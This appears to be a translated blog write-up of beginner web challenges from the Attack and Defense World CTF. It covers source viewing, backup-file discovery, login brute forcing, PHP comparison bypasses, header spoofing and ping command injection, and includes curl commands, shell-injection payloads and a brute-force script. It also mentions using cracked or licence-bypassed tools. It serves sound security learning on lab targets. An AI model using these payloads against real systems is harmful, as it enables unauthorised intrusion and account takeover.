Web Beginner’s Exercise in the World of Attack and Defense

Foreword:
As Heaven moves vigorously, the gentleman ceaselessly strengthens himself;
as Earth's disposition is receptive, the gentleman carries all things with generous virtue.
           ————"Book of Changes"

I came to CTF fairly late, nearly halfway through the semester, and my first challenges were on Attack and Defense World (adworld). The challenges there suit newcomers, so I am writing this post to record them.


View_source

There are four methods:
Method 1: Use Firefox (worth setting up now, since BurpSuite, Hackbar and similar tools are easier to use with it later). Press F12 and the developer tools open at the bottom of the page, where the page source can be read.
Method 2: Prefix the URL with "view-source:" (the text inside the double quotes) and press Enter; the browser shows the page's source.
Method 3: Right-click and choose View Page Source (Ctrl+U). This challenge disables right-click, so even trying it gets you nowhere; this method is out here.
Method 4: Open a command prompt (Win+R, type cmd, Enter) and run [curl http://61.147.171.105:62119/] (the command is the text inside the square brackets; the address is your own container's, so copy and paste yours). curl prints the raw HTML, which contains the flag.
The point behind all four: the browser only renders the HTML it received, but the server has already sent the whole file, and nothing in the page can stop the client from reading it.

robots

First understand the robots protocol: robots.txt tells search-engine crawlers which paths may be crawled and which may not. It is a request to well-behaved crawlers, not an access control, so anything listed in it is also a hint to an attacker.
The page is blank and the challenge name is the hint: append /robots.txt to the URL (http://61.147.171.105:59224/robots.txt).
robots.txt reveals the file f1ag_1s_h3re.php; visit url/f1ag_1s_h3re.php to get the flag.

Visiting f1ag_1s_h3re.php
Usually a file like this will not print the flag directly; it only shows up when you view the page source. There are other ways of reaching file contents as well, such as file upload and command execution, which come up in later challenges.

backup
A .bak file is a backup copy of a web page file (bak: backup). The challenge asks straight out "Do you know the backup file name of index.php?", and the answer is: "Yes, it is index.php.bak." Requesting it triggers a download; open the file with Notepad to get the flag.
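The two challenges above come down to the same recon step: read what the server volunteers (robots.txt) and ask for files the admin forgot to remove. The helper below is an added example, not code from the original post. It parses robots.txt for Disallow entries, lists backup names worth trying for a page, and probes them; the robots.txt text and the suffix list are constructed/assumed for this example, and fetch() is injectable so the logic runs offline.

```python
# Added example (not from the original post): recon helper for the
# "robots" and "backup" challenges. Sample data below is constructed.
import urllib.error
import urllib.request

SAMPLE_ROBOTS = """\
# constructed sample, shaped like the challenge's robots.txt
User-agent: *
Disallow: f1ag_1s_h3re.php
Allow: /
"""

# Suffixes that editors, deploy scripts and admins commonly leave behind
# (assumed list; extend it from your own experience).
BACKUP_SUFFIXES = (".bak", "~", ".swp", ".old", ".orig", ".save",
                   ".txt", ".zip", ".tar.gz", ".rar")


def parse_robots(text):
    """Return every path a robots.txt asks crawlers not to visit, normalised
    to start with '/'. Comments, blank lines and other fields are skipped."""
    paths = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()        # strip comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        if field.lower() == "disallow" and value:
            paths.append(value if value.startswith("/") else "/" + value)
    return paths


def backup_candidates(filename):
    """Backup-file names worth requesting for a page such as index.php."""
    stem = filename.rsplit(".", 1)[0]
    names = [filename + suffix for suffix in BACKUP_SUFFIXES]
    names += ["." + filename + ".swp", stem + ".bak", stem + ".zip"]  # vim swap, stripped ext
    return names


def http_fetch(url):
    """Default fetcher: (status, body). HTTP errors are returned, not raised."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""


def probe(base_url, paths, fetch=http_fetch):
    """Return the paths under base_url that answer 200, i.e. exist."""
    base = base_url.rstrip("/")
    return [p for p in paths if fetch(base + "/" + p.lstrip("/"))[0] == 200]


if __name__ == "__main__":
    print(parse_robots(SAMPLE_ROBOTS))
    print(backup_candidates("index.php"))
```

Against a live container you would call probe(container_url, parse_robots(robots_text) + backup_candidates("index.php")); a 200 on index.php.bak is the download described above.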

cookie
Following the hint, open Storage -> Cookies in the developer tools and find a cookie pointing at cookie.php. Visit it (http://61.147.171.105:62539/cookie.php) to get the next hint: "view http response".

There are three methods next:

  • Method 1:

Required tools: Firefox, BurpSuite
Tool learning: search for "BurpSuite installation and configuration tutorial", "BurpSuite packet capture configuration", "BurpSuite sending requests" and "BurpSuite capturing localhost traffic"; there is also a good overview article. (Note: these may not be the exact articles I used at the time, so they may no longer work; if they fail, search for other posts or blogs, or message me. The overall idea is: install a JDK and set up the Java environment, download BurpSuite into a suitable directory (the tutorial I followed used a cracked edition; the free Community Edition has the Repeater and Intruder needed for these challenges), then configure proxy capture. I later hit two more problems: the JDK had to be updated to JDK 18, and the .bat launcher taken from GitHub no longer worked and threw an error. After a long search I found a fix; contact me if you need help.)
Capture the request to cookie.php, send it to Repeater and read the HTTP response: the flag is in the response headers, not the body, which is why the HEAD request in Method 2 is enough.
Note that after configuring the manual proxy in Firefox, remember to switch it back afterwards, otherwise you will not be able to browse anything.

  • Method 2:
    Idea: use curl
    Run [curl -I http://61.147.171.105:62539/cookie.php] in the command prompt; -I sends a HEAD request and prints only the response headers, and the flag is there.
  • Method 3:
    The blogger I learned from read the response directly in the Network tab of the developer tools, but when I tried it I got a Not Found error, so this does not seem to work.

I recommend Method 1. There are no shortcuts in learning security; you have to be down-to-earth. Without accumulating single steps you cannot travel a thousand li; without gathering small streams you cannot form a river or sea.

disabled_button
In the developer tools inspector, delete the disabled attribute from the button element; the button becomes clickable and submitting it returns the flag (do not refresh: F5 reloads the original HTML and the attribute comes back). Now I understand the technique a little: the restriction lives entirely in the HTML and JavaScript delivered to the browser, so it only controls what the browser renders; the server receives whatever the client decides to send.

weak-auth
This one is about brute-forcing the account and password. Several dictionaries can be found online, e.g. https://www.somd5.com/download/dict/ (well, the ones there turned out to be useless for this challenge). I first tried a few guesses by hand. Step 1: capture the login request and Send to Intruder.
Step 2: choose the attack type and mark the positions to attack (wrapped in §§).
Step 3: go to Payloads and set the dictionaries, i.e. the values to try. Set the username payload, then the password payload, and that is about it.
Step 4: during the attack we already receive the hint "please login as admin" (in fact it appears after trying just a few letters as the username).
Now only the password is wrong, so go back, fix username=admin, switch to the Sniper attack type with the password as the only position, and set the payload list.
The last step was swapping dictionaries (the earlier list of numbers from 10000 to 100000 did not contain it), and the result was the flag!
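The same two-stage attack as a script, as an added example that is not part of the original post. The form field names (username, password) and the "password error" failure text are assumptions about the challenge; "please login as admin" is the hint quoted above. post() is injectable so the logic can be exercised offline, and Intruder's usual tell (a different response length) is replaced by checking for a marker string, which is the same idea.

```python
# Added example (not from the original post): Burp Intruder's two-stage
# brute force as a script. Field names and failure marker are assumptions.
import urllib.parse
import urllib.request


def post_login(url, username, password):
    """Submit the login form and return the response body as text."""
    data = urllib.parse.urlencode(
        {"username": username, "password": password}).encode()
    req = urllib.request.Request(
        url, data=data,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def find_username(url, usernames, post=post_login,
                  hint="please login as admin"):
    """Stage 1 (Burp: both positions). A response without the 'wrong user'
    hint means the username exists; the password used here is a dummy."""
    for user in usernames:
        if hint.lower() not in post(url, user, "x").lower():
            return user
    return None


def find_password(url, username, passwords, post=post_login,
                  failure="password error"):
    """Stage 2 (Burp: Sniper on the password position only). The first
    password whose response lacks the failure marker is the one."""
    for pwd in passwords:
        if failure.lower() not in post(url, username, pwd).lower():
            return pwd
    return None


def brute_force(url, usernames, passwords, post=post_login):
    """Return (username, password) or None if both lists are exhausted."""
    user = find_username(url, usernames, post)
    if user is None:
        return None
    pwd = find_password(url, user, passwords, post)
    return None if pwd is None else (user, pwd)


if __name__ == "__main__":
    # Real use: brute_force("http://<container>/check.php", users, passwords)
    # where users/passwords are lists read from wordlist files.
    pass
```

Reading the hint before throwing a whole dictionary at both fields is what saves time here: once the username is known, the search space is just the password list.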

simple_php

Tools used: Firefox browser, Hackbar

<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];   // value of a, passed by GET
$b=@$_GET['b'];   // value of b, passed by GET
// '==' is a loose comparison: null, "0x", "0a" and the like are all treated as == 0.
// Passing a=0 directly does not work: 'and' is a logical AND, and a=0 is falsy, so the if fails.
if($a==0 and $a){
    echo $flag1;
}
// is_numeric() can be bypassed with an array, a trailing letter or encoding tricks;
// search for articles on PHP is_numeric() bypasses.
// b[]=1235, b=1235a, b=1235%1, b=1235>1 all get past it.
if(is_numeric($b)){
    exit();
}
if($b>1234){
    echo $flag2;
}
?>

You also need to understand passing parameters by GET and POST. GET parameters go straight after the URL as {/?name1=value1&name2=value2} (the text inside the curly braces); for this challenge, {http://61.147.171.105:56165/?a=0a&b=1235%1} passes both parameters and gives both flags. (Note: "0a" == 0 relies on the loose comparison of PHP 7 and earlier, where any string is cast to a number for the comparison. PHP 8 compares a non-numeric string with an int as strings, so a=0a fails there; a=0.0 or a=00 still works on both, because those are numeric strings equal to 0 and, unlike "0", are truthy.)
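To make the PHP 7 versus PHP 8 difference concrete, here is an added example (not code from the original post): a Python model of the two checks above. It implements the rules of PHP's is_numeric(), loose comparison of a string or array with an int, and truthiness, accurately enough to show which payloads survive on each version. It is a model, not PHP; exotic inputs (hex, octal, locale-specific forms) are out of scope.

```python
# Added example (not from the original post): model of simple_php's checks
# under PHP 7 and PHP 8 comparison rules.
import re

_NUM = r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?"


def php_is_numeric(value, php8=False):
    """is_numeric(): the whole string must be a decimal number. PHP 7 allows
    leading whitespace only; PHP 8 also allows trailing whitespace. Arrays
    (b[]=1235) are never numeric."""
    if isinstance(value, list):
        return False
    tail = r"\s*$" if php8 else r"$"
    return re.match(r"^\s*" + _NUM + tail, value) is not None


def _leading_number(value):
    """Numeric prefix PHP uses when casting a string: '1235a' -> 1235.0,
    'abc' -> None."""
    m = re.match(r"\s*" + _NUM, value)
    return float(m.group(0)) if m else None


def php_cmp(value, number, php8=False):
    """Loose comparison of a GET value (string or array) with an int;
    returns -1, 0 or 1 like PHP's <=>.
    PHP 7: every string is cast to a number (non-numeric -> 0), so
           '0a' == 0 and 'abc' == 0 both hold.
    PHP 8: only fully numeric strings compare numerically; otherwise the
           int is cast to a string and the two are compared as strings."""
    if isinstance(value, list):
        return 1                       # an array is always greater than a scalar
    if php8 and not php_is_numeric(value, php8=True):
        s = str(number)
        return (value > s) - (value < s)
    n = _leading_number(value)
    if n is None:
        n = 0.0
    return (n > number) - (n < number)


def php_truthy(value):
    """Inside if(): only '' and '0' (and an empty array) are false."""
    if isinstance(value, list):
        return len(value) > 0
    return value not in ("", "0")


def simple_php(a, b, php8=False):
    """The challenge's checks in order; returns (flag1, flag2) as booleans."""
    flag1 = php_cmp(a, 0, php8) == 0 and php_truthy(a)
    if php_is_numeric(b, php8):
        return flag1, False            # exit() before the second check
    return flag1, php_cmp(b, 1234, php8) > 0


if __name__ == "__main__":
    for version in (False, True):
        print("PHP 8" if version else "PHP 7",
              simple_php("0a", "1235%1", version),
              simple_php("0.0", "1235a", version))
```

Run it and the write-up's payload a=0a shows as (True, True) on PHP 7 and (False, True) on PHP 8, while a=0.0 passes on both; the b side ("1235%1", "1235a", or an array) passes on both because a string that is not numeric still sorts after "1234" in a string comparison.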
Passing POST parameters needs the Hackbar tool. Hackbar installation:
Option 1: Hackbar with the licence requirement worked around (the paid version): Firefox-Hackbar-2.2.9-Learning Edition, Jiangnan Xiaochongchong's blog (fengwenhua.top)
Option 2: install Hackbar directly: download the zip package, then add the xpi to Firefox as an add-on: https://github.com/Mr-xn/hackbar2.1.3
(I believe I used the second route; remember to turn off updates for Hackbar, otherwise it will ask you to register again.)

get_post
Tools used: Firefox, Hackbar

Use Hackbar to pass GET and POST parameters; I trust you have already learned this from Article 1, Article 2 and Article 3 (articles 2 and 3 go a little further).
Here we pass the parameters with BurpSuite instead.
Step 1: capture the request and Send to Repeater.
The challenge asks us to pass a variable named a with value 1 by GET. We add {?a=1} at the spot marked by the arrow, which is what passing by GET means, and get the next hint: now pass a variable named b with value 2 by POST.
Step 2: POST in b.
First change GET in the top left to POST, then enter b=2 on the line after the blank line (the request body) and click Send. But the flag does not appear, which was puzzling.
Not believing it, I went back to Firefox, submitted a=1 and b=2 through Hackbar first, let Burp intercept that request, sent it to Repeater, sent it again, and there was the flag.
Comparing the two requests, the hand-made one was missing information: it had no Content-Type header. A form body is only parsed into POST parameters when the request declares Content-Type: application/x-www-form-urlencoded (Burp's "Change request method" adds it for you). The Content-Type header matters elsewhere too: in file-upload challenges, changing the declared type (for example to text/plain or image/jpeg) is the classic way past an upload check that trusts the declared type rather than the content, which is how code gets uploaded as an "image".
When a challenge needs GET or POST parameters, it is easiest to submit them from Hackbar first and let Burp capture that request: the template, headers included, then appears and you only have to edit the parameter values rather than add everything by hand.
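Why the hand-made Repeater request failed is easy to see by building both requests byte for byte and running them through a minimal model of how PHP fills $_GET and $_POST. This is an added example, not code from the original post; the host name is a placeholder and the parser models only the form-urlencoded case (PHP also parses multipart bodies, which are out of scope here).

```python
# Added example (not from the original post): raw HTTP requests as Burp
# Repeater sends them, and a minimal model of PHP's $_GET/$_POST filling.
import urllib.parse

FORM = "application/x-www-form-urlencoded"


def build_request(host, path, query=None, form=None, content_type=None):
    """Build a raw HTTP/1.1 request. query -> GET parameters in the URL,
    form -> urlencoded body. content_type=None with a form reproduces the
    mistake above: a body with no Content-Type header."""
    target = path + ("?" + urllib.parse.urlencode(query) if query else "")
    method = "POST" if form is not None else "GET"
    body = urllib.parse.urlencode(form).encode() if form is not None else b""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}"]
    if form is not None:
        if content_type:
            lines.append(f"Content-Type: {content_type}")
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def php_superglobals(raw):
    """Return ($_GET, $_POST) for a raw request. $_GET always comes from the
    query string; $_POST is filled only when the declared Content-Type is
    the form encoding. Duplicate keys keep the last value, as PHP does."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode().split("\r\n")
    _, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    query = urllib.parse.urlsplit(target).query
    get = {k: v[-1] for k, v in urllib.parse.parse_qs(query).items()}
    post = {}
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == FORM:
        post = {k: v[-1] for k, v in urllib.parse.parse_qs(body.decode()).items()}
    return get, post


if __name__ == "__main__":
    bad = build_request("example.invalid", "/", {"a": "1"}, {"b": "2"})
    good = build_request("example.invalid", "/", {"a": "1"}, {"b": "2"}, FORM)
    print(bad.decode(), php_superglobals(bad), sep="\n")
    print(good.decode(), php_superglobals(good), sep="\n")
```

The first request carries b=2 in its body and still yields an empty $_POST; adding the one header is the whole difference.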

xff_referer

Tools used: Firefox, BurpSuite
Opening the environment, the page says outright "the ip address must be 123.123.123.123", so we need to fake the IP address. There are three ways.
Method 1: Forge the request header in BurpSuite. Capture the request -> Send to Repeater, and add {X-Forwarded-For: 123.123.123.123} among the request headers. (It must go in the header block: if you add it below the blank line it becomes part of the body and is ignored.)
Method 2: Add the header with Hackbar. Click Load URL and the request headers appear row by row; click Add Header, and in the new row enter {X-Forwarded-For: 123.123.123.123} (the text inside the curly braces; note the space after the colon). I did not fully understand the principle at the time; it is simply that the server reads the client address from the X-Forwarded-For header, which reverse proxies normally add but which any client can write itself. For more on faking IPs see Blog 1, Website 1 (blog) and Website 2 (Tencent Cloud).
A hint then appears: "Must come from https://www.google.com", which means we must forge the Referer header as well. In Hackbar add Referer with the value {https://www.google.com}, press execute, and get the flag.
Method 3: Use curl from the command prompt (Learning curl command website:). Add X-Forwarded-For to get the Referer hint, then add the Referer too to get the flag.

Get Referer prompt

curl  http://61.147.171.105:64406/ -H "X-Forwarded-For: 123.123.123.123"

get flag

curl  http://61.147.171.105:64406/ -H "X-Forwarded-For: 123.123.123.123" --referer "https://www.google.com"
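The defender's side of this challenge, as an added example that is not part of the original post: a server must only honour X-Forwarded-For when the TCP peer is one of its own proxies, and then read it from the right-hand end, because the left-hand entries are whatever the client typed. The Referer check shows the matching pitfall: a string prefix test is not a host test. The addresses and the trusted-proxy set below are constructed for the example.

```python
# Added example (not from the original post): trusting X-Forwarded-For and
# Referer correctly versus the way the challenge does it.
from urllib.parse import urlsplit


def naive_client_ip(remote_addr, headers):
    """What the challenge does: believe X-Forwarded-For whoever sent it."""
    return headers.get("X-Forwarded-For", remote_addr)


def client_ip(remote_addr, headers, trusted_proxies):
    """Client address for an app behind known proxies.
    Build the hop chain (XFF entries left to right, then the TCP peer) and
    walk it from the right: each of our own proxies is skipped, and the
    first address that is not ours is the client. A direct connection with
    a spoofed header therefore yields remote_addr, not the header value."""
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    chain = [h for h in hops if h] + [remote_addr]
    for addr in reversed(chain):
        if addr not in trusted_proxies:
            return addr
    return chain[0]          # every hop is ours: the leftmost is the origin


def naive_referer_ok(referer):
    """Prefix check: also passes https://www.google.com.evil.example/ ."""
    return referer.startswith("https://www.google.com")


def referer_ok(referer):
    """Parse the URL and compare scheme and host exactly."""
    parts = urlsplit(referer)
    return parts.scheme == "https" and parts.hostname == "www.google.com"


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "123.123.123.123"}
    print(naive_client_ip("198.51.100.7", spoof))              # the spoofed value
    print(client_ip("198.51.100.7", spoof, {"10.0.0.1"}))       # the real peer
    print(referer_ok("https://www.google.com.evil.example/"))   # False
```

Even the careful version only identifies the client; neither X-Forwarded-For nor Referer is sent by anyone but the client, so neither is usable as an access control, which is exactly what the challenge demonstrates.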

Expand learning articles:
https://www.freebuf.com/articles/database/269712.html

Share a favourite poem
           "Five Poems of Parting Thoughts, No. 4" (Yuan Zhen)
           Having once seen the great sea, no other water will do; apart from Wushan, no cloud is a cloud.
           I pass the flowers and cannot be bothered to look back, half because of the Way I practise, half because of you.

command_execution

First, a few articles on command injection through the ping command: Article 1, Article 2, Article 3, Article 4.
The page pings whatever address you type, and the input is passed to a shell unfiltered, so a ; ends the ping command and starts one of our own.
First execute {127.0.0.1;ls /} to list the root directory. (This challenge has no filtering at all; when you meet filtered versions later, the articles above cover the bypasses. If you have good articles to recommend, leave a comment and we can learn together ^_^)
Then look directory by directory (ping is slow, so each try takes a while; I do not know a faster way), for example {127.0.0.1;ls /usr -al} to list /usr. Keep trying and eventually there is a flag.txt under /home. With an unfiltered shell, a single {127.0.0.1;find / -name "flag*" 2>/dev/null} would have located it in one request.
Run {127.0.0.1;tac /home/flag.txt} and view the page source to get the flag. (I do not know much about this yet; learn from what the experts write.)
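The injection above next to its fix, as an added example that is not code from the original post. The challenge's server-side code is not shown on the page, so vulnerable_command() is an assumed reconstruction (a format string handed to a shell); the blacklist filter is the kind of half-fix seen in the "filtered" variants the articles above cover, and the bypass list shows why it is not enough.

```python
# Added example (not from the original post): command injection through a
# ping form, a naive blacklist, and the argv + validation fix.
import ipaddress
import subprocess

# Inputs a ';'-only blacklist still lets through (constructed list).
BYPASSES = ["127.0.0.1|ls /", "127.0.0.1 && ls /", "127.0.0.1\nls /",
            "127.0.0.1 `ls /`", "127.0.0.1 $(ls /)"]


def vulnerable_command(target):
    """Assumed shape of the challenge: user input spliced into one shell
    line and run with shell=True. /bin/sh parses the string, so ';' ends
    ping and starts a second command of the attacker's choosing."""
    return f"ping -c 3 {target}"


def blacklist_ok(target):
    """A naive filter that only rejects ';'. The shell has other separators
    and substitutions (see BYPASSES)."""
    return ";" not in target


def safe_ping_argv(target):
    """The fix: validate the input as an IP address and build an argv list
    so that no shell ever parses it. Raises ValueError on anything else."""
    ip = ipaddress.ip_address(target)       # "127.0.0.1;ls /" -> ValueError
    return ["ping", "-c", "3", str(ip)]


def is_safe_target(target):
    """True if safe_ping_argv() would accept the input."""
    try:
        safe_ping_argv(target)
        return True
    except ValueError:
        return False


def run_ping(target):
    """Run the validated command without a shell (network side effect)."""
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=15).stdout


if __name__ == "__main__":
    print(vulnerable_command("127.0.0.1;tac /home/flag.txt"))
    print([blacklist_ok(p) for p in BYPASSES])     # all True: filter is useless
    print([is_safe_target(p) for p in BYPASSES])   # all False: validation holds
```

The lesson generalises beyond ping: do not sanitise the string for the shell, remove the shell from the path entirely, and validate the one value you actually need against the type it must be.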

simple_js

(The environment is temporarily broken and cannot be opened...
I am currently setting up JavaScript and studying it on the side, and hope to provide a proper write-up for everyone who supports this. For now, read this blogger's article; if it helps, remember to give that blogger a like... (* ̄0 ̄)ノ)
php2
Tools used: Firefox, Yujian (御剑), Hackbar

Yujian (the scanner I currently use; I found it through this blog. Its wordlist is huge; other directory scanners such as wscan and dirsearch are also recommended):
Link: https://pan.baidu.com/s/1Bn7GtWb7AStcjzVahFOjSQ
Extraction code: zkaq
(After downloading and extracting you get the Yujian background scanner .exe and an archive of Yujian configuration files; extract that archive too. Open the scanner .exe, enter a URL (take Baidu as an example: www.baidu.com), click start scan and then cancel it. Back in the .exe's folder there is now a new folder called configuration files; copy the various .txt files from the extracted configuration archive into it.
Then close the scanner .exe and reopen it, and it works normally.)

Opening the environment gives the hint "Can you anthenticate to this website?". I stared at it for a long time without understanding it. Scanning with Yujian found /index.phps. (Apache serves a .phps file as syntax-highlighted PHP source instead of executing it, which is why the source leaks.) Note that the default Yujian wordlists do not contain it, so you have to add it yourself, which is easy: the files directory of Yujian holds many .txt wordlists, and you can add "/index.phps" to one of them or create a new list, after which the scan finds it.
Then visit /index.phps; the complete source is visible when you view the page source.

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
// second URL decode of the id parameter; the first decode was already done for us when $_GET was populated
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
  // this is where the flag is printed; the .phps copy shows only xxxxxxx, the live index.php prints the real key
}
?>

Through analysis: we must pass a parameter id by GET that is loosely equal (==) to admin but, before the second decode, not strictly equal (===) to admin. So we construct the payload {?id=%2561dmin}: %25 is "%" and %61 is "a", so the first decode (done by the server when filling $_GET) turns %2561 into %61, which fails the strict check, and the second decode (the explicit urldecode()) turns %61 into "a", giving "admin" for the loose check, and the flag appears! (Note: the bare constant in $_GET[id] only produces a notice on PHP 7 but is a fatal error on PHP 8, so this challenge runs on older PHP.)
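The double decode modelled step by step, as an added example that is not code from the original post. The first unquote() stands for the decode the web server and PHP perform while filling $_GET; the second is the explicit urldecode() in index.phps. encode_twice() builds the payload for any character position, which generalises the single case shown above.

```python
# Added example (not from the original post): php2's double URL decode and
# the payload construction, in Python.
from urllib.parse import unquote


def php2_check(raw_id):
    """Return the text the challenge prints for the raw id value exactly as
    it appears in the query string."""
    once = unquote(raw_id)          # decode #1: automatic, before the script runs
    if once == "admin":             # "admin" === $_GET[id]
        return "not allowed!"
    twice = unquote(once)           # decode #2: urldecode($_GET[id])
    if twice == "admin":            # $_GET[id] == "admin"
        return "Access granted!"
    return ""                       # neither branch: empty page


def encode_twice(text, index=0):
    """Percent-encode one character, then encode the '%' itself, so the
    value only becomes the target string after two decodes:
    'admin' -> '%2561dmin'. Any index works; one layer of difference is
    enough to fail the strict check and pass the loose one."""
    code = format(ord(text[index]), "02X")
    return text[:index] + "%25" + code + text[index + 1:]


if __name__ == "__main__":
    for payload in ("admin", "%61dmin", encode_twice("admin"), encode_twice("admin", 4)):
        print(payload, "->", php2_check(payload) or "(blank)")
```

The plain and single-encoded forms both hit the strict check, because one decode has already produced "admin" by the time the script runs; only the double-encoded form reaches the second branch.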


Due to many academic tasks, updates may be suspended for a while.

Origin blog.csdn.net/m0_63944500/article/details/127930057